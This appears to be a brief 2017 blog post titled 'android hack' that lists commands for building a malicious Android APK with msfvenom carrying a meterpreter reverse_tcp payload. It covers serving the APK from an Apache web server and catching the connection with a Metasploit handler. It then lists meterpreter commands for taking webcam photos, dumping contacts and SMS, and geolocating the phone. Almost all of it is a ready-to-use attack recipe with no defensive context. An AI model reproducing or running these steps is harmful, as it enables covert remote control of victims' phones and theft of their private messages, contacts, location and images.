[可用]android hack

  1. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 R > shell.apk
  2. service apache2 start
  3. mv shell.apk /var/www/html
  4. msfconsole
  5. use exploit/multi/handler
  6. set payload android/meterpreter/reverse_tcp

android meterpreter:
sysinfo
check_root
webcam_snap
dump_contacts
dump_sms
geolocate

posted @ 2017-02-19 10:35  itholiday  阅读(203)  评论(0编辑  收藏  举报